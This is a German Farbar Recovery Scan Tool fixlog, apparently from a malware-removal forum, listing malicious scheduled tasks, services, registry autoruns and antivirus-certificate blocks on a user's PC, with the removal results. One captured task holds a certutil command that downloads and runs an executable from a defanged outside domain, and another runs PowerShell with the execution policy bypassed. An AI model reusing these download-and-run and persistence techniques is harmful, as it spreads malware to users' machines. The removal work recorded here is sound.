R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
         

Addition:

Code: Alles auswählenAufklappen

ATTFilter

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
